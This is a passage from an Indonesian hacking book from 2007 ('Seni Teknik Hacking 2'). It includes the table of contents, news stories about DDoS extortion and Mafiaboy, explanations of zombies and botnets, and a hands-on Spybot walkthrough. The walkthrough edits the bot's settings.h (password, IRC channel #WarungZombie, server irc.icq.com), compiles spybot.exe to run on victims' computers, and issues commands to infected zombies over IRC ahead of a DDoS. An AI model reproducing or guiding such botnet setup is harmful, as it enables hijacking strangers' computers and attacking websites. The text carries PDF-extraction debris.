Anda di halaman 1dari 44

Blank

Jasakom S’to
http://www.Jasakom.com/Penerbitan
SENI TEKNIK HACKING 2 : UNCENSORED

Hak Cipta © 2007 pada penulis

Hak Cipta dilindungi Undang-Undang. Dilarang memperbanyak atau memindahkan


sebagian atau seluruh isi buku ini dalam bentuk apapun, baik secara elektronis maupun
mekanis, termasuk memfotocopy, merekam atau dengan sistem penyimpanan lainnya,
tanpa izin tertulis dari Penulis dan Penerbit.

ISBN 979-1090-03-3 (jil.2)

Cetakan pertama : Pebruari 2007

Publisher Contact
Jasakom PO Box 6179 JKB
Fax : 021-56957634
Web Site HP : 0888-1911091
http://www.jasakom.com/penerbitan
Cover Design & Idea & Layout
Email S’to
admin@jasakom.com

Ketentuan pidana pasal 72 UU No. 19 tahun 2002

1. Barang siapa dengan sengaja dan tanpa hak melakukan kegiatan sebagaimana dimaksud dalam pasal 2 ayat
(1) atau pasal 49 ayat (1) dan ayat (2) dipidana dengan pidana penjara paling singkat 1 (satu) bulan dan/atau
denda paling sedikit Rp. 1.000.000 (satu juta rupiah) atau pidana penjara paling lama 7 (tujuh) tahun dan/
atau denda paling banyak Rp. 5.000.000.000.00 (lima miliar rupiah).
2. Barang siapa dengan sengaja menyiarkan, memamerkan, mengedarkan, atau menjual kepada umum suatu
Ciptaan atau barang hasil pelanggaran Hak Cipta atau Hak Terkait sebagaimana dimaksud pada ayat (1), dipi-
dana dengan pidana penjara paling lama 5 (lima) tahun dan/atau denda paling banyak Rp. 500.000.000,00
(lima ratus juta rupiah)

IV
Kata Pengantar
Tidak terasa, sudah 2 tahun semenjak terbitnya buku STH-1 yang telah
dicetak ulang sebanyak 6x. Harapan yang besar oleh pembaca buku
di seri STH-1 membuat saya menyusun dengan lebih berhati-hati agar
seri ke-2 ini tidak mengecewakan dengan memperhatikan permintaan
dari pembaca, walaupun tidak semua permintaan bisa saya penuhi
semuanya.

Materi-materi yang dibahas, dipilih dengan sangat hati-hati dan saya


sengaja tidak membahas exploit (ya, ada satu, tapi itu cuman contoh.
sumpah, cuman 1 exploit). Alasannya adalah ketika saya terlalu ba-
nyak membahas tentang exploit, hal tersebut akan menjadi basi ketika
buku ini sampai ditangan Anda. Oleh karena itu, pembahasan lebih
dititik beratkan pada permasalahan yang selalu kita temukan dalam ke-
hidupan sehari-hari dan merupakan ancaman nyata.

Dan tentu saja, kini STH-2 juga menyertakan Video Tutorial yang tidak
terdapat pada buku STH-1, sesuai dengan permintaan semua pem-
baca (benar, semuaaaanya). Video tutorial kini menggunakan interface
baru versi pertama yang saya harapkan bisa mempermudah pembaca
dalam mengakses video tutorial yang ada.

Harapan saya, kerja keras selama ini dalam menyusun buku ini bisa
memuaskan harapan Anda. Apakah akan ada seri STH-3 ? tidak ada
yang bisa mengetahuinya, termasuk saya. Tentu saja, bila ada per-
mintaan yang tinggi dan topik yang menarik, saya akan mencoba lagi
membuat seri lanjutan ini, yaitu STH-3.

S ’to
email : sto@jasakom.com
http://www.jasakom.com/sto


Jasakom e-Learning Versi 1.00
Daftar Isi
BAGIAN 1 Sniffing, ARP Poisoning & Man-In-the-Middle 1
Sniffer 3
Ethernet 4
CSMA/CD 6
Enkapsulasi dan Dekapsulasi 7
Hub 8
Sniffing, Action !! 10
Hack 2x01 12
Passive Sniffing Hub – Ngintip Semua Data
Hack 2x02 16
Passive Sniffing pada Hub – Ngintip Password ICQ,
POP3, TELNET, SMTP, dll
Hack 2x03 19
Passive Sniffing pada Hub – Ngintip Password Web
Site
Switch 22
Jenis Switch 23
RAM Switch 25
Hack 2x04 30
Active Sniffing pada Switch – MAC Address flooding
Hack 2.05 34
Active Sniffing pada Switch – Man-in-the-middle Attack
(MITM)
Hack 2.06 39
Active Sniffing pada Switch – Hacking Klikbca, Ci-
tibank, dkk
Hack 2.07 56
Mencegah Sniffing dengan Enkripsi
Hack 2.08 58
Mencegah Perubahan ARP Cache
VII
2 2 2 2 2 2 2 2 2 2 2
BAGIAN 2 DNS & DHCP Hacking 61
DNS Server & Nama Domain 63
Hack 2.09 66
DNS HACKING
Hack 2.10 70
DNS Host File Hacking
Hack 2x11 74
DHCP Spoofing

BAGIAN 3 Sessions Hijacking & Keylogger 61


Session Hijacking 83
TCP/IP In Action 84
Three Way Handshake dan Sinkronisasi 86
Session Hijacking dan Sequence Number 90
ACK Storms 93
Sessions Hijacking Tools 94
Hack 2x12 96
Session Hijacking In Action
Hack 2x13 105
Melawan Sessions Hijacking
Keylogger 106
Apa Keylogger itu Legal ? 106
Jenis Keylogger 107
Hack 2x14 111
Menggunakan Hardware Keylogger
Hack 2x15 113
Menggunakan Software Keylogger – KGB Keylogger

VIII
Jasakom
2 2 2 2 2 2 2 2 2 2 2
Hack 2x16 118
Menggunakan Software Keylogger – Fearless Keylog-
ger
Hack 2x17 123
Penggabungan files, menipu dengan file games
Hack 2x18 128
Mengatasi Keylogger

BAGIAN 4 Vulnerabilities Scanner, DDoS & BOTNET 61


Vulnerabilities dan Exploit 135
Hack 2x19 137
Maaf, Anda Korban yang Tepat !
Mesin Pencari Kelemahan Otomatis 140
Hack 2x20 142
Vulnerability Scanner – GFILANguard
Hack 2x21 146
Retina
Hacker Rusia Kerjai Situs Taruhan 149
‘Mafiaboy’ ditangkap karena melakukan serangan 150
DDoS
Apa dan Bagaimana Serangan DDoS 152
Bagaimana Mencari Zombie 154
Zombie Tidak Hanya Untuk DDoS 156
BOTNET 157
Hack 2x22 159
SPYBOT
Index 173

IX
Jasakom
Blank
2 2 2 2 2 2 2 2 2 2 2

BAGIAN 4
N
Kamis , 29/07/2004 11:42 WIB

BOTNET
Hacker Rusia Kerjai
Situs Taruhan

N
Titis Widyatmoko - detikInet

DDoS
Jakarta, Hacker asal Rusia diintip
terus oleh satuan polisi gabungan
Rusia dan Inggris. Aksi para hacker itu

N
dituding menjadi penyebab kerugian
puluhan juta dolar yang dialami situs-

VULNERABILITIES SCANNER
situs taruhan di Inggris.
Cara yang dilakukan oleh hacker
asal Rusia ini adalah pemerasan
ke situs-situs taruhan. Hacker akan melakukan serangan Denial of Service
(DOS) membanjiri traffic situs sehingga sulit diakses. Kemudian mereka
akan meminta uang sebagai syarat untuk menghentikan serangan. “Tujuannya
adalah membuat timpang kerja perusahaan,” kata Yevgeny Yakimovich, kepala
anti cybercrime di Departemen Dalam Negeri Rusia.
Rusia, dengan tenaga kerja berpendidikan yang jumlahnya besar namun jumlah

N
polisi yang tidak cukup membuatnya terkenal sebagai surga pembajakan dan
kriminal komputer.
“Orang sudah dibuat takut oleh mafia Rusia, sekarang mereka dibikin takut
oleh hacker Rusia,” tandas Letjen Polisi Boris Miroshnikov yang disampaikan
kepada Presiden Rusia Vladimir Putin dikutip kantor berita Itar-Tass, Kamis
(29/7/2004).
Para hacker asal Rusia ini memeras setidaknya sembilan situs taruhan Inggris.
Serangan dilakukan tiga sampai lima kali dengan meminta bayaran sampai
dengan US$ 50 ribu. Dua bandar judi online yang menderita kerugian banyak
sempat setuju membayar masing-masing sebesar US$ 40 ribu.
Bandar judi online kerapkali menjadi sasaran para hacker pemeras ini pada
saat-saat penting dimana transaksi situs ini sedang tinggi. Biasanya hal itu
terjadi ketika ada even-even olahraga penting.
Tim gabungan cyber detektif Inggris dan Rusia telah berusaha mencari
tersangka di beberapa kota di Rusia. Polisi berhasil menangkan dua tersangka
dan menyita komputer serta software di Moskow, St Petersburg dan wilayah
Saratov. (tis/)
149
Jasakom
2 2 2 2 2 2 2 2 2 2 2 BAGIAN 4
N

* Berita diambil dari : http://jkt.detikinet.com/index.php/detik.read/tahun/2004/


bulan/07/tgl/29/time/114215/idnews/183342/idkanal/110
VULNERABILITIES SCANNER

Berita lainnya yang juga sangat menarik menceritakan tentang


Mafiaboy, seorang bocah biasa di dunia nyata namun merupakan
sosok yang menakutkan di dunia maya. Situs-situs besar seperti CNN,
Yahoo, Amazon, eBay dan ZDNet semuanya tumbang dan bertekuk
lutut kepada seorang bocah berumur 15 tahun.
Berita selengkapnya bisa Anda baca di situs zdnet.com. Saya akan
mencoba melakukan penerjemahan disini agar Anda lebih mudah
untuk membacanya :
N
DDoS

‘Mafiaboy’ ditangkap karena melakukan


N

serangan DDoS
BOTNET

Penegak hukum dari Amerika dan Canada bekerja


sama dalam menangkap seorang bocah Canada
N

berumur 15 tahun dan menuntutnya melakukan


serangan cyber denial-of-service tingkat tinggi.
Bocah yang tidak disebutkan nama aslinya karena
alasan umur ini, menggunakan nick “Mafiaboy.”. Ia
ditangkap pada tanggal 15 April dan dituntut dua hari
kemudian setelah polisi menggeledah rumahnya.
Di Washington, Jaksa Agung US Janet Reno
mengatakan bahwa Mafiaboy harus di hukum
“Saya pikir sangatlah penting untuk memperlihatkan kepada anak-anak muda
bahwa mereka tidak bisa melarikan diri dari setelah apa yang mereka lakukan
ini. Ia harus dihukum”. Reno juga memberikan peringatan kepada vandalisme
cyber lainnya
“Saya percaya bahwa pencapaikan ini menunjukkan kemampuan kita untuk
mencari siapa yang melakukan pengacauan di dalam teknologi baru ini, dan
mencarinya dimanapun ia berada”, kata Reno.
150
Jasakom
2 2 2 2 2 2 2 2 2 2 2

BAGIAN 4
N
Tapi ini juga merupakan peringatan kepada web site-web site lainnya, bahwa

BOTNET
seorang hacker tidak perlu mempunyai kemampuan teknis yang sangat tinggi
untuk melakukan perusakan.
“Dia mempunyai kemampuan yang baik dibidang komputer, tapi masih
tidak pantas dikatakan sebagai jenius”, kata Jean-Pierre dari Royal Canadian

N
Mounted Police (RCMP) pada suatu konferensi pers.

DDoS
RCMP mengatakan bahwa hukumannya bisa termasuk 10 tahun penjara. Juru
bicara RCMP mengatakan bahwa FBI telah menghubungi mereka pada awal

N
febuari ketika serangan dilakukan.

VULNERABILITIES SCANNER
Sambil menunggu tuntutan dalam persidangan, anak ini dilarang menggunakan
komputer selain disekolah dan diperintahkan untuk tidak menggunakan
internet. Jam malam juga diberlakukan oleh pengadilan terhadap anak ini.
Polisi mengatakan bahwa investigasi terus berlangsung dan tambahan tuntutan
mungkin saja terjadi terhadap Mafiaboy atau orang-orang lainnya yang ikut
terlibat.
Berbeda dengan kejahatan umumnya, penjahat cyber tidak mengenal batas
negara dan kedaulatan. Mafiaboy dituntut terutama karena serangan empat jam
terhadap CNN.com pada tanggal 8 februari. Polisi mengatakan bawah anak ini
menyombongkan serangannya di dalam chatroom dan area lainnya.

N
“Hacker suka menyombongkan kemampuan dirinya, mereka suka pamer
untuk memperlihatkan bahwa mereka jago dan mereka adalah yang terbaik”
kata RCMP, “Menurut analisa kami, Mafiaboy sebenarnya tidaklah sehebat
itu”.
Serangan dilakukan dengan menggunakan satu komputer yang memerintahkan
komputer-komputer “budak” di seluruh dunia. Komputer “budak” bisa
digunakan tanpa sepengetahuan pemiliknya. Hacker membuat komputer-
komputer ini mengirimkan banyak sekali data-data ke situs internet dalam
waktu yang singkat, yang akan menyebabkan web site korban menjadi berhenti
bekerja. Ini sama saja dengan membuat jutaan orang menelpon ke nomor
telepon yang sama.
Komputer di University of California di Santa Barbara (UCSB) digunakan
untuk menyerang CNN. Kantor berita ABC News telah melaporkan bahwa
penyidik menggunakan catatan log di komputer UCSB untuk melacak serangan
yang dilakukan oleh Mafiaboy.

151
Jasakom
2 2 2 2 2 2 2 2 2 2 2 BAGIAN 4

Mafiaboy diduga juga meminta pendapat dari hacker lain tentang situs yang
N

hendak diserang berikutnya. Serangan yang dilakukan selama tiga hari,


meluluh lantakkan situs-situs utama seperti Yahoo! Amazon.com, eBay, CNN.
VULNERABILITIES SCANNER

com dan ZDNet. Kejadian ini mengejutkan kita karena menunjukkan betapa
mudahnya seseorang bisa menyebabkan kerusakan yang sedemikian besarnya
tanpa perlu mempunyai kemampuan yang tinggi.
* Berita diambil dari : http://news.zdnet.com/2100-9595_22-520033.html

Kejadian yang menghebohkan dunia ini walaupun diakui sebagai


pekerjaan “tidak hebat” telah merugikan sekitar 1.2 Juta dolar menurut
perkiraan dari Yankee Group.
N

Sang hacker akhirnya di penjara selama 8 bulan dan denda $160.


Lucunya memang “pekerjaan biasa” ini tidak bisa dicegah oleh
DDoS

perusahaan-perusahaan kelas dunia dan sampai saat inipun tetap


menjadi sebuah ancaman terbesar dunia internet.
N
BOTNET

Apa dan Bagaimana Serangan DDoS


N

Serangan yang paling menakutkan sampai detik ini masih tetap


dipegang oleh DdoS. Serangan ini pula yang memaksa gedung putih
memindahkan server mereka setelah membuat marah hacker dari cina
dan serangan yang membuat situs microsoft tidak bisa diakses. Anda
bisa membayangkan betapa berbahayanya serangan tanpa obat seperti
ini.
Setiap ada kejadian penting ditanah air, seperti pelaku peledakan bom
oleh orang-orang yang mengira surga ada di dalam darah manusia
maka situs detik.com adalah situs yang paling banyak diakses. Orang
kantoran secara serentak mengakses situs detik.com
Bisa dibayangkan, begitu banyak orang yang mengakses situs detik.com
dalam waktu bersamaan, maka tidak heran, tidak perlu menunggu
sampai besok, detik itu juga detik.com pun tumbang dan tidak bisa
diakses (sesuai dengan motonya).

152
Jasakom
2 2 2 2 2 2 2 2 2 2 2

BAGIAN 4
N
Kejadian ini selalu berulang dan tidak ada yang bisa dilakukan oleh

BOTNET
detik.com karena dianggap sebagai kejadian yang normal.
Lonjakan pengguna pada waktu yang bersama-sama telah
menghabiskan bandwidth detik.com. Bandwidth detik.com,
tidaklah sebanding dengan kumpulan bandwidth kecil dari seluruh

N
penggunanya.

DDoS
Ini memang bukan serangan dari hacker namun tindakan dan akibatnya
sama persis seperti yang dilakukan oleh hacker dengan teknis DDoS.

N
Andaikan seorang hacker mempunyai pasukan sebanyak pengguna

VULNERABILITIES SCANNER
detik.com yang melihat berita, maka sang hacker bisa membuat
detik.com down/mati setiap detik, kapanpun diinginkan. Jika
serangan dilakukan terus menerus, maka bisnis detik.com bisa hancur
berantakan. Siapa yang mau memasang iklan disitus yang tidak aktif?
Atas dasar seperti inilah, sempat terjadi beberapa kasus pemerasan
yang dilakukan oleh para hacker yang mampu melancarkan serangan
DDoS ini terhadap situs-situs yang menggantungkan hidupnya dari
dunia maya.

Gambar 84. Serangan DDoS

153
Jasakom
2 2 2 2 2 2 2 2 2 2 2 BAGIAN 4
N

Hacker yang melancarkan serangan DDoS, haruslah mempunyai banyak


komputer yang siap diperintah. Komputer-komputer ini dinamakan
VULNERABILITIES SCANNER

sebagai zombie, slave atau budak. Hacker akan memerintah komputer


zombie melalui komputer perantara yang dinamakan sebagai Master.
(gambar 84)
Ketika sang hacker hendak melakukan serangan DDoS, ia hanya perlu
masuk ke komputer yang bertindak sebagai Master ini, kemudian
memberikan perintah dari situ. Semua komputer zombie (mayat
hidup) yang mendengarkan perintah dari ‘tuannya”, akan segera
melakukan serangan terhadap komputer korban yang ditentukan oleh
sang hacker.
N

Dengan cara seperti inilah, serangan DDoS (Distributed Denial Of


Service) dilakukan. Karena serangan ini melibatkan banyak sekali
DDoS

komputer penyerang yang terdistribusi dimana-mana namun dengan


satu sasaran, maka dinamakan sebagai “Distributed” DoS.
N
BOTNET

Bagaimana Mencari Zombie


N

Untuk melakukan serangan DDoS, syarat


utamanya adalah memiliki pasukan Zombie
sebanyak-banyaknya. Semakin banyak
seseorang memiliki komputer zombie, maka
kekuatannya semakin besar dan dengan mudah
ia bisa membuat situs manapun yang tidak mempunyai bandwidh yang
sebanding dengannya untuk down. Sebesar apapun sebuah bandwidth,
pastilah ada batasnya dan ini adalah inti dari serangan DDoS.
Anda sudah melihat salah satu berita dari detik.com, dimana hacker
yang memiliki banyak “pasukan”, kini sudah tidak melakukan
penyerangan secara membabi buta. Mereka meminta “uang keamanan”
kepada pemilik web seperti layaknya preman pasar. Bila ditolak ?
multibet.com menolaknya dan situs mereka terpaksa harus down selama
20 hari ! dan, yah badai pasti berlalu, serangan itu memang akhirnya
berhenti juga namun bukan karena penyerangnya kecapean atau putus
asa, tapi karena multibet.com memutuskan untuk membayar !

154
Jasakom
2 2 2 2 2 2 2 2 2 2 2

BAGIAN 4
N
Lalu bagaimana hacker mencari atau mendapatkan komputer zombie ?

BOTNET
tentu saja jangan berharap hacker akan memintanya baik-baik, karena
hal itu tidak ada dalam kamus hacker. Mereka akan mengambil alih
komputer Anda untuk dijadikan zombie dengan berbagai cara.
Hacker semacam ini tidak melakukan aktifitas hacking dengan

N
melakukan aksi deface. Bagi mereka aksi deface adalah sebuah

DDoS
bencana, karena server tersebut akan segera diperbaiki yang artinya
mereka tidak punya akses lagi. Untuk itu, server yang berhasil diambil
alih, akan diamankan agar tidak mendapatkan serangan dari pihak

N
lain dan yang terpenting, tidak diketahui oleh sang pemilik bahwa

VULNERABILITIES SCANNER
komputernya telah diambil alih dan sudah menjadi komputer zombie.
Aksi hacking memang bisa mengambil alih sebuah komputer dan
menjadikannya sebagai zombie, namun cara ini terlalu lambat. Metode
menjadikan komputer sebagai zombie yang paling cepat adalah dengan
bantuan worm. Hacker hanya perlu menamkan fungsi zombie sehingga,
pencarian korban akan dilakukan secara otomatis tanpa perlu kerja
keras dan manual dari sang hacker.
Hacker cina membuat worm CodeRed yang melakukan penyerangan ke
situs gedung putih www.whitehouse.gov dan menyebabkan situs ini harus
dipindahkan. Berapa komputer yang didapatkan oleh worm CodeRed

N
ini ? 359.000 dalam waktu 14 jam dan total komputer di seluruh dunia
yang berhasil didapatkan, diperkirakan mencapai jutaan !
Bila Anda tertarik dengan masalah Worm, Anda bisa membaca buku
yang ditulis oleh Achmad Darmal. Buku yang diberi judul “Computer
Worm 1” dan “Computer Worm 2” yang diterbitkan oleh Jasakom, adalah
buku yang sangat menarik untuk mengetahui lebih jauh tentang
apa dan bagaimana membuat worm yang sering dianggap sebagai
pengetahuan tabu.

155
Jasakom
2 2 2 2 2 2 2 2 2 2 2 BAGIAN 4

Zombie Tidak Hanya Untuk DDoS


N

Seorang hacker yang memiliki banyak zombie, tidak hanya


VULNERABILITIES SCANNER

memanfaatkan pasukannya untuk melakukan serangan DDoS. Hacker


bisa melakukan banyak sekali hal-hal yang mengerikan dengan
pasukannya, diantaranya adalah :
1. Sebagai SPAMMER
SPAM tentu sudah bukan barang (email) asing lagi. Saya
mendapatkan sekitar 100 email SPAM setiap harinya. Aksi SPAM
sebagian dilakukan melalui komputer Zombie. Pelakunya tidak
perlu menggunakan bandwidh yang besar untuk mengirimkan
jutaan email karena semuanya dilakukan oleh komputer zombie.
N

Karena IP yang digunakan juga sangat banyak dari berbagai


negara, cara ini akan menyulitkan email server dalam mem-blok IP
DDoS

penyebar SPAM. (spammer memang brengsek)


2. Pay per click
N

Google, yahoo serta ribuan situs lainnya mempunyai layanan pay per
click yang sangat menarik. Anda memasang iklan yang disediakan
BOTNET

oleh google ataupun situs lainnya yang menawarkan kerjasama


semacam ini. Jika ada pengunjung situs Anda yang mengklik banner
tersebut, Anda akan mendapatkan bayaran sekitar $0.01 sampai
N

dengan $0.5. Masalahnya adalah mengharapkan pengunjung untuk


mengklik banner ini tidaklah mudah.
Untuk itu, hacker tinggal memerintahkan semua zombie yang
dimiliki untuk meng-klik banner yang dipasang. Akibatnya adalah
hacker akan mendapatkan bayaran uang dalam jumlah yang banyak
tanpa perlu bersusah payah memperkenalkan web sitenya. Cara
ini banyak digunakan namun pengiklan biasanya akan memonitor
aktifitas yang dianggap tidak normal dan apabila dianggap ada
kecurangan semacam ini, komisi tidak akan dibayar (setelah banyak
kasus penipuan).
Tentu saja tidak semua kecurangan berhasil dilacak dan ada saja
hacker yang tetap menggunakan zombie dengan sangat hati-hati
untuk meraup uang sebanyak-banyaknya.

156
Jasakom
2 2 2 2 2 2 2 2 2 2 2

BAGIAN 4
N
3. Pencurian bandwidh dan space

BOTNET
Hacker bisa memanfaatkan komputer yang dikuasainya untuk
menyimpan film porno, software bajakan dan material illegal
lainnya sambil melakukan penjualan barang-barang tersebut.

N
Cara ini relatif aman dan murah karena hacker tidak perlu
menyediakan bandwidth yang mahal dan material illegal juga

DDoS
tidak berada di komputernya sehingga menyulitkan aparat yang
berwenang dalam menangkap mereka.

N
VULNERABILITIES SCANNER
Membicara apa yang bisa dilakukan oleh hacker dengan “pasukannya”,
merupakan topik yang tidak ada habisnya. Dengan adanya pasukan
komputer yang banyak, hacker bisa melakukan apa saja yang
dikehendaki.

BOTNET

N
Anda mungkin sudah banyak sekali mendengar cerita dari koran,
cerita dari majalah serta kabar burung dan kabar tetangga mengenai
serangan DDoS. Serangan ini memang sangat heboh sehingga banyak
sekali yang mampu menceritakan hal ini dengan sangat meyakinkan,
tapi sedikit yang benar-benar mengetahui bagaimana melakukannya
serta teknik apa yang digunakan.
Perintah ping yang paling sering didemokan sebenarnya sudah bisa
dikatakan tidak pernah digunakan lagi karena hampir semua firewall
telah melakukan bloking terhadap protokol ICMP !
Melakukan serangan DDoS, seperti yang telah saya katakan,
membutuhkan tentara zombie. Untuk membentuk tentara zombie ini,
digunakan program-program seperti Tribal Flood Network (TFN),
Trinoo, TFN2K, WinTrinoo, Trinity dan lain sebagainya. Sekarang
bersiaplah kecewa karena saya tidak membahas semua software ini
untuk melakukan serangan DDoS (salahkan saya sekarang).

157
Jasakom
2 2 2 2 2 2 2 2 2 2 2 BAGIAN 4

Tentu saja, buku ini tidak hanya memberikan Anda cerita yang hanya
N

cerita. Teknik serangan DDoS yang akan dibahas disini adalah jenis
serangan yang sangat dikenal di dunia hacker, dunia para pemimpin
VULNERABILITIES SCANNER

pasukan zombie yang hidup di bawah tanah.


Teknik yang digunakan adalah dengan software robot yang dikenal
di dunia chatting IRC. Software robot ini dikenal dengan nama “bot”
yang bekerja sesuai dengan perintah tuannya.
N
DDoS
N
BOTNET
N

Gambar 85. BOTNET

Metode yang digunakanpun sama seperti yang telah saya ceritakan


sebelumnya. Komputer-komputer yang telah menjadi zombie, akan di
install program bot yang secara otomatis akan join ke channel irc yang
telah ditentukan oleh sang hacker, contohnya channel #xxx.
Bot-bot yang berkumpul ini dinamakan sebagai botnet dan merupakan
kumpulan pasukan yang siap menjalankan perintah tuannya.

158
Jasakom
2 2 2 2 2 2 2 2 2 2 2

BAGIAN 4
N
Hacker, mengendalikan bot-bot ini dengan cara masuk ke channel

BOTNET
ini dan tinggal memerintahkan bot ini untuk melakukan apapun
yang dikehendaki. Dengan satu perintah, semua bot akan melakukan
serangan ke komputer korban yang membuatnya tidak berkutik dan
tumbang tanpa darah yang mengalir (hanya air mata).

N
Software bot yang sering digunakan antara lain adalah spybot, sdbot,

DDoS
agobot, GTBot, phatbot dan berbagai variasi bot lainnya. Bot yang
telah saya sebutkan ini semuanya tersedia dalam bentuk source code
sehingga variantnya bisa dikatakan tidak terhitung jumlahnya.

N
Bot-bot ini sendiri bukanlah program yang mudah untuk didapatkan

VULNERABILITIES SCANNER
karena pencarian dengan search engine seperti google dan yahoo tidak
memberikan hasil yang memuaskan kecuali pembahasan tentang bot-
bot ini. Pada buku ini, saya akan menggunakan spybot sebagai contoh
pembahasan.
Dengan sedikit kemampuan programming, Anda bisa merubah bot ini
sesuai dengan keinginan dan unik dari yang lain-lainnya. Akibatnya ?
zombie ini semakin hari semakin berkembang dan berkembang seiring
dengan kemampuan para coder hebat yang masih berusia muda
(mereka bahkan mempunyai waktu yang tidak terbatas).

N
SPYBOT
Spybot merupakan salah satu bot yang
terkenal di dunia underground dan sangat
luas digunakan oleh para hacker. Bot ini dibuat
dengan bahasa C oleh Mich yang sebelumnya disebarkan secara
terbatas melalui situsnya http://members.lycos.co.uk/ircspybot (saat ini
sudah tidak aktif lagi)
Karena program ini berupa source code, Anda harus melakukan proses
kompilasi yang sering menakutkan pengguna awam. Namun, Anda
tidak perlu khawatir, pembuat program ini telah menyediakan sebuah
batch file yang tinggal Anda klik dan selesailah sudah.

159
Jasakom
2 2 2 2 2 2 2 2 2 2 2 BAGIAN 4

Saya mendownload compiler gratis bahasa C seperti yang disarankan


N

yaitu lcc-win32 dari http://www.q-software-solutions.com. Instalasi program


lcc-win32 yang bisa Anda dapatkan dari CD yang disertakan pada buku
VULNERABILITIES SCANNER

ini, sangatlah mudah dan tidak ada yang perlu di ceritakan lebih lanjut.
Anda hanya perlu klik next, next, finish dan selesai.
File sumber spybot terdiri atas file spybot.c yang merupakan source
code file sedangkan konfigurasi disimpan pada file yang berbeda yaitu
settings.h. Anda menentukan sifat dan karakteristik file spybot yang
hendak di ciptakan melalui file settings ini.
Sebagai contohnya, saya ambil beberapa baris penting pada file
settings.h.
N

char password[] = “password”; //bots password


char channel[] = “#testing”; //channel bot joins on connect
DDoS
N

Baris password[] merupakan password untuk memerintah bot., tanpa


mengetahui password ini, bot akan diam seribu bahasa ketika Anda
perintahkan untuk melakukan sesuatu.
BOTNET

Secara default, password yang digunakan adalah password dan saya


tidak akan menggantinya untuk saat ini.
N

Secara default channel tersebut diset dengan #testing dan disini akan
saya ganti menjadi #WarungZombie. Setelah perubahan, kedua baris
tersebut akan berubah menjadi :

char password[] = “password”; //bots password


char channel[] = “#WarungZombie”; //channel bot joins on connect

IRC mempunyai banyak sekali jaringan-jaringan yang berdiri


sendiri. Misalnya, server-server dalam kelompok dalnet, tidak bisa
berhubungan dengan server-server dalam kelompok undernet karena
jaringan keduanya berdiri sendiri. Channel #jasakom yang dibuat
dalam server dalnet, berbeda sama sekali dengan channel #jasakom
yang ada di undernet.

160
Jasakom
2 2 2 2 2 2 2 2 2 2 2

BAGIAN 4
N
Karena itu, kita juga perlu menentukan server mana channel

BOTNET
#WarungZombie akan dibuat. Baris yang menentukan hal ini berada
pada baris berikut :

//servers

N
char *ircservers[]={

DDoS
“127.0.0.1”,
“irc.icq.com”,
NULL //dont remove this line
};

N
//number of ports MUST be the same as the number of servers you use,
int serverports[]={

VULNERABILITIES SCANNER
6667,
6666,
};

Secara default, server yang akan digunakan dimasukkan ke dalam array


bernama ircservers yang secara default menggunakan 127.0.0.1 dan
server irc.icq.com. Nomor port yang digunakan harus sesuai jumlahnya
dengan server yang digunakan dan karena menggunakan dua server,
terdapat dua port yang digunakan yaitu 6667 dan 6666.
Jika Anda hendak merubahnya ke server dalnet misalnya, Anda juga
harus mengetahui port yang digunakan oleh server tersebut dan
mengisinya pada baris serverports[].

N
Gambar 86. Melihat konfigurasi
server-server IRC

Untuk mengetahui nama


server dan juga port
server IRC, Anda bisa
mendownload list server-
server IRC dari internet.
Saya menggunakan
software mIRC dan dari
situ juga bisa dilihat
dengan mengklik tombol
Options a Connect a
Servers a Pilih server
IRC a Edit. Terlihat server irc.icq.com termasuk dalam ketegory
group IrCQNet.
161
Jasakom
2 2 2 2 2 2 2 2 2 2 2 BAGIAN 4

Pada contoh ini, saya tidak akan merubah server yang digunakan
N

dan hanya menghapus server lokal 127.0.0.1 karena memang tidak


digunakan. Code akhir setelah saya edit akan tampak seperti berikut :
VULNERABILITIES SCANNER

char *ircservers[]={
“irc.icq.com”,
NULL //dont remove this line
};

//number of ports MUST be the same as the number of servers you use,

int serverports[]={
7000,
};
N

Catatan
Baris komentar dimulai dengan karakter //. Jadi jika Anda hendak
DDoS

menghilangkan sebuah baris agar tidak dicompile, Anda tinggal


menambahkan karakter // di depan seperti tampak pada baris
N

keterangan “//number of ports MUST be the same as the number of servers you use” di
atas
BOTNET

Setting lainnya masih sangat banyak seperti memberikan password


N

channel agar hanya orang-orang yang mengetahui password saja yang


bisa join ke channel, menjalankan web server dan keylogger secara
otomatis, mengganti perintah-perintah default seperti perintah “list”
menjadi “perlihatkan”, dan lain sebagainya. Program ini dibuat dengan
struktur yang sangat rapi sehingga melakukan modifikasi setting
menjadi mudah.
Setelah proses konfigurasi selesai dilakukan, saatnya untuk melakukan
kompilasi. Klik file “Make spybot.bat” yang akan menghasilkan file
spybot.exe. File inilah yang nantinya harus dijalankan di komputer
korban.
Pada percobaan ini, saya menggunakan 3 komputer dengan koneksi
internet masing-masing. Hal ini dilakukan karena server irc.icq.com
hanya mengijinkan 2 koneksi yang terjadi sekaligus, pada koneksi ke-3,
alamat IP malah akan di-ban (black list) oleh server irc sehingga tidak
bisa melakukan koneksi lagi.

162
Jasakom
2 2 2 2 2 2 2 2 2 2 2

BAGIAN 4
N
Selain menggunakan irc server publik, hacker juga bisa membuat

BOTNET
server irc sendiri namun cara ini jarang dilakukan karena memudahkan
penangkapan hacker tersebut. Pada kejadian sesungguhnya, komputer-
komputer zombie adalah komputer yang berbeda dan mempunyai
alamat IP nya masing-masing sehingga tidak begitu bermasalah dengan

N
aturan semacam ini.

DDoS
Pada contoh, saya menggunakan mIRC untuk melakukan koneksi
ke channel #WarungZombie dengan server irc.icq.com dan nick
HackerDDOS.

N
Pada cerita ini, diasumsikan 2 komputer telah terinfeksi dengan bot,

VULNERABILITIES SCANNER
dimana bot ini secara otomatis akan join ke channel #WarungZombie. Satu
zombie menggunakan nick Zombie152 dan satunya lagi menggunakan
nick Zombir187.
Nama nick bot diambil dari user yang login ditambah dengan angka
secara acak. Pada contoh, dua komputer yang terinfeksi masing-masing
login dengan nama Zombie1 dan script secara otomatis menambahkan
angka 52 dan 87.

Gambar 87. Memerintah Zombie melalui channel IRC

163
Jasakom
2 2 2 2 2 2 2 2 2 2 2 BAGIAN 4

Pada contoh, terlihat saat saya mengetikkan perintah “info” kepada bot
N

agar menampilkan informasi system tempat dirinya berada, bot tidak


memberikan reaksi apapun. Agar bot mau mendengarkan perintah
VULNERABILITIES SCANNER

dari tuannya, Anda harus mengetahui password bot terlebih dahulu.


Password defaultnya adalah “password” yang tidak saya ganti.
Untuk itu, saya bisa login ke bot dengan mengetikkan perintah “login
password”.
Setelah itu, saya mencoba lagi menjalankan perintah “info”. Kali ini,
para bot sudah mengetahui bahwa yang mengirimkan perintah adalah
tuan mereka sehingga masing-masing bot menampilkan informasi
system tempat dirinya berada.
N
DDoS
N
BOTNET
N

Gambar 88. Melakukan serangan DDoS

